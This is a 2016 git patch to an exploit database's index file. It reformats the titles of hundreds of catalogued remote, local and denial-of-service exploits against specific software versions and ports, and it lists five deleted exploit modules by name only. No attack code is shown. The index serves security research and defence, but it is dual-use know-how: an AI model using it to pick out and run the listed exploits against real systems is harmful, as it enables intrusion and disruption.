From 4c43b1da2be16873b9eabe4b7d34fc7d11c903f3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Aug 2016 05:07:18 +0000 Subject: [PATCH] DB: 2016-08-25 --- files.csv | 4735 ++++++++++++++-------------- platforms/linux/remote/23360.rb | 198 -- platforms/multiple/remote/16288.rb | 69 - platforms/multiple/remote/18730.rb | 226 -- platforms/windows/remote/17037.rb | 147 - platforms/windows/remote/17626.rb | 132 - 6 files changed, 2365 insertions(+), 3142 deletions(-) delete mode 100755 platforms/linux/remote/23360.rb delete mode 100755 platforms/multiple/remote/16288.rb delete mode 100755 platforms/multiple/remote/18730.rb delete mode 100755 platforms/windows/remote/17037.rb delete mode 100755 platforms/windows/remote/17626.rb diff --git a/files.csv b/files.csv index dd884bf6b..5569b6a85 100755 --- a/files.csv +++ b/files.csv @@ -164,7 +164,7 @@ id,file,description,date,author,platform,type,port 168,platforms/windows/remote/168.c,"RealSecure / Blackice - iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Exploit",2004-03-28,blackangels,hardware,remote,0 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 -171,platforms/linux/remote/171.c,"tcpdump ISAKMP Identification payload Integer Overflow Exploit",2004-04-05,Rapid7,linux,remote,0 +171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow Exploit",2004-04-05,Rapid7,linux,remote,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow Exploit",2004-04-07,I2S-LaB,windows,local,0 173,platforms/linux/remote/173.pl,"Monit 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812 174,platforms/linux/remote/174.c,"Monit 4.2 - Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812 @@ -174,9 +174,9 @@ id,file,description,date,author,platform,type,port 178,platforms/linux/local/178.c,"traceroute - Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow Exploit",2000-11-15,vade79,linux,local,0 -181,platforms/linux/remote/181.c,"Half Life (rcon) Remote Buffer Overflow Exploit",2000-11-16,"Sao Paulo",linux,remote,27015 +181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow Exploit",2000-11-16,"Sao Paulo",linux,remote,27015 182,platforms/linux/local/182.sh,"Redhat 6.2 /sbin/restore - Exploit",2000-11-16,anonymous,linux,local,0 -183,platforms/linux/local/183.c,"Oracle (oidldapd connect) Local Command Line Overflow Exploit",2000-11-16,anonymous,linux,local,0 +183,platforms/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow Exploit",2000-11-16,anonymous,linux,local,0 184,platforms/linux/local/184.pl,"Perl (Redhat 6.2) - Restore and Dump Local Exploit",2000-11-16,Tlabs,linux,local,0 185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 186,platforms/linux/local/186.pl,"xsplumber - strcpy() Buffer Overflow",2000-11-17,vade79,linux,local,0 @@ -190,7 +190,7 @@ id,file,description,date,author,platform,type,port 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 - crontab Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow Exploit",2000-11-20,K2,hp-ux,local,0 -200,platforms/bsd/local/200.c,"BSDi suidperl Local Stack Buffer Overflow Exploit",2000-11-21,vade79,bsd,local,0 +200,platforms/bsd/local/200.c,"BSDi suidperl - Local Stack Buffer Overflow Exploit",2000-11-21,vade79,bsd,local,0 201,platforms/multiple/remote/201.c,"wu-ftpd 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Local Root Exploit",2000-11-21,"Michal Zalewski",linux,local,0 @@ -203,23 +203,23 @@ id,file,description,date,author,platform,type,port 210,platforms/solaris/local/210.c,"Solaris - locale Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 211,platforms/cgi/webapps/211.c,"PHF - Buffer Overflow Exploit for Linux-x86",2000-12-01,proton,cgi,webapps,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow Exploit",2000-12-01,venglin,hp-ux,dos,0 -213,platforms/solaris/remote/213.c,"Solaris sadmind Remote Buffer Overflow Exploit",2000-12-01,Optyx,solaris,remote,111 +213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow Exploit",2000-12-01,Optyx,solaris,remote,111 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0 -215,platforms/linux/local/215.c,"glibc locale bug mount Exploit",2000-12-02,sk8,linux,local,0 +215,platforms/linux/local/215.c,"glibc - locale bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0 -218,platforms/linux/local/218.c,"expect (/usr/bin/expect) Buffer Overflow",2000-12-04,isox,linux,local,0 +218,platforms/linux/local/218.c,"expect (/usr/bin/expect) - Buffer Overflow",2000-12-04,isox,linux,local,0 219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow Exploit (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow Exploit",2000-12-06,Gneisenau,linux,remote,80 221,platforms/linux/local/221.c,"Kwintv - Local Buffer Overflow Exploit (gid=video(33))",2000-12-06,"Cody Tubbs",linux,local,0 -222,platforms/linux/local/222.c,"gnome_segv Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 +222,platforms/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515 227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String Exploit",2000-12-11,DiGiT,linux,remote,515 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow Exploit",2000-12-15,diman,bsd,remote,3128 229,platforms/linux/local/229.c,"Red Hat 6.2 xsoldier-0.96 - Exploit",2000-12-15,zorgon,linux,local,0 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 -231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0 +231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 @@ -240,14 +240,14 @@ id,file,description,date,author,platform,type,port 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux - Exploit",2001-01-15,teleh0r,linux,local,0 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 -254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 +254,platforms/hardware/remote/254.c,"Cisco - Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 -261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 +261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0 @@ -257,7 +257,7 @@ id,file,description,date,author,platform,type,port 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 -272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 +272,platforms/windows/local/272.c,"WinZIP - MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 @@ -273,18 +273,18 @@ id,file,description,date,author,platform,type,port 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Local Root Exploit",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - (prodb) Local Root Exploit",2001-03-04,"the itch",multiple,local,0 289,platforms/cgi/webapps/289.pl,"sendtemp.pl Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 -290,platforms/linux/local/290.sh,"GLIBC 2.1.3 ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0 -291,platforms/linux/remote/291.c,"TCP Connection Reset Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 +290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0 +291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow Exploit",2004-05-05,vade79,linux,remote,0 -297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 +297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 300,platforms/multiple/remote/300.c,"CVS - Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow Exploit",2004-06-25,anonymous,solaris,remote,2401 -302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit",2004-06-25,anonymous,unix,local,0 +302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow Exploit",2004-06-25,anonymous,unix,local,0 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0 @@ -296,10 +296,10 @@ id,file,description,date,author,platform,type,port 312,platforms/windows/dos/312.txt,"Norton AntiVirus - Denial of Service",2004-07-12,"Bipin Gautam",windows,dos,0 313,platforms/windows/remote/313.txt,"Microsoft Outlook Express - Window Opener",2004-07-13,anonymous,windows,remote,0 315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - Javascript Execution",2004-07-13,anonymous,windows,remote,0 -316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 +316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0 -320,platforms/linux/local/320.pl,"suid_perl 5.001",1996-06-01,"Jon Lewis",linux,local,0 +320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD & Linux umount - Local Root Exploit",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library - Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0 324,platforms/windows/dos/324.txt,"Ping of Death - Remote Denial of Service",1996-10-21,anonymous,windows,dos,0 @@ -308,7 +308,7 @@ id,file,description,date,author,platform,type,port 329,platforms/windows/dos/329.txt,"Microsoft Windows NT - Crash with an Extra Long Username Denial of Service",1997-04-01,Fyodor,windows,dos,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt - XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 -332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 +332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey - Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow Exploit",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"IRIX - Multiple Buffer Overflow Exploits (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 335,platforms/aix/local/335.c,"AIX lquerylv - Local Root Buffer Overflow Exploit",1997-05-26,"Georgi Guninski",aix,local,0 @@ -319,7 +319,7 @@ id,file,description,date,author,platform,type,port 340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143 341,platforms/solaris/local/341.c,"Solaris 2.4 - passwd & yppasswd & nispasswd Overflow Exploits",1997-07-12,"Cristian Schipor",solaris,local,0 343,platforms/bsd/dos/343.c,"TCP SYN - 'bang.c' Denial of Service",2002-09-17,Nebunu,bsd,dos,0 -345,platforms/windows/dos/345.c,"UDP Stress Tester Denial of Service",2002-09-10,Cys,windows,dos,0 +345,platforms/windows/dos/345.c,"UDP Stress Tester - Denial of Service",2002-09-10,Cys,windows,dos,0 346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow Exploit",2002-05-14,Teso,linux,remote,0 348,platforms/linux/remote/348.c,"wu-ftpd 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 @@ -330,14 +330,14 @@ id,file,description,date,author,platform,type,port 353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0 354,platforms/windows/dos/354.html,"Microsoft Internet Explorer - Overly Trusted Location Cache Exploit",2004-07-18,anonymous,windows,dos,0 355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 -356,platforms/windows/dos/356.c,"OverByte ICS FTP Server Remote Denial of Service",2004-07-20,ATmaCA,windows,dos,0 +356,platforms/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,windows,dos,0 357,platforms/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow",2004-07-20,"Luigi Auriemma",windows,dos,0 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",hardware,dos,0 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535 360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)",2004-07-22,bkbll,multiple,dos,80 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 -362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service",2004-07-22,CoolICE,windows,dos,0 -363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 +362,platforms/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,windows,dos,0 +363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0 @@ -351,9 +351,9 @@ id,file,description,date,author,platform,type,port 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0 375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - (mshtml.dll) Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 -378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 +378,platforms/windows/remote/378.pl,"BlackJumboDog - Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Remote Arbitrary Code Execution Exploit",2004-08-06,anonymous,linux,remote,0 -380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 +380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 @@ -369,7 +369,7 @@ id,file,description,date,author,platform,type,port 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd (ftpdctl) - Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 -396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0 +396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit (teso)",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 @@ -389,27 +389,27 @@ id,file,description,date,author,platform,type,port 418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 -421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0 +421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0 422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",windows,dos,0 423,platforms/windows/dos/423.pl,"Easy File Sharing Webserver 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0 -424,platforms/linux/remote/424.c,"Citadel/UX Remote Buffer Overflow Exploit",2004-08-30,Nebunu,linux,remote,504 +424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow Exploit",2004-08-30,Nebunu,linux,remote,504 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0 -426,platforms/windows/remote/426.c,"TiTan FTP Server Long Command Heap Overflow PoC Exploit",2004-08-31,lion,windows,remote,21 +426,platforms/windows/remote/426.c,"TiTan FTP Server - Long Command Heap Overflow PoC Exploit",2004-08-31,lion,windows,remote,21 427,platforms/windows/dos/427.c,"WFTPD Pro Server 3.21 - MLST Remote Denial of Service",2004-08-31,lion,windows,dos,0 -428,platforms/windows/dos/428.c,"CesarFTP Server Long Command Denial of Service",2004-08-31,lion,windows,dos,0 +428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0 429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0 431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM - 'Away' Message Remote Exploit (2)",2004-09-02,"John Bissell",windows,remote,0 432,platforms/bsd/remote/432.c,"Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos,0 434,platforms/linux/local/434.sh,"CDRDAO - Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 -435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 +435,platforms/windows/remote/435.c,"Trillian 0.74i - Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Remote Privilege Escalation",2004-09-08,mantra,php,webapps,0 437,platforms/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 438,platforms/linux/local/438.c,"CDRecord - $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow Exploit",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0 -464,platforms/cgi/webapps/464.txt,"Turbo Seek Null Byte Error Discloses Files to Remote Users",2004-09-13,durito,cgi,webapps,0 +464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 465,platforms/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Message(s) Bug",2004-09-16,iko94,php,webapps,0 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0 468,platforms/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",windows,dos,0 @@ -417,7 +417,7 @@ id,file,description,date,author,platform,type,port 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66 472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0 -473,platforms/windows/remote/473.c,"MDaemon 6.5.1 IMAP/SMTP Remote Buffer Overflow Exploit",2004-09-22,D_BuG,windows,remote,143 +473,platforms/windows/remote/473.c,"MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow Exploit",2004-09-22,D_BuG,windows,remote,143 474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0 475,platforms/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0 476,platforms/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow Exploit (PoC)",2004-09-23,CoKi,linux,local,0 @@ -437,8 +437,8 @@ id,file,description,date,author,platform,type,port 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow Exploit",2004-10-04,LoWNOISE,windows,remote,80 568,platforms/windows/remote/568.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 570,platforms/php/webapps/570.txt,"WordPress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 -571,platforms/windows/dos/571.c,"Monolith Games Local Buffer Overflow Exploit",2004-10-10,"Luigi Auriemma",windows,dos,0 -572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 +571,platforms/windows/dos/571.c,"Monolith Games - Local Buffer Overflow Exploit",2004-10-10,"Luigi Auriemma",windows,dos,0 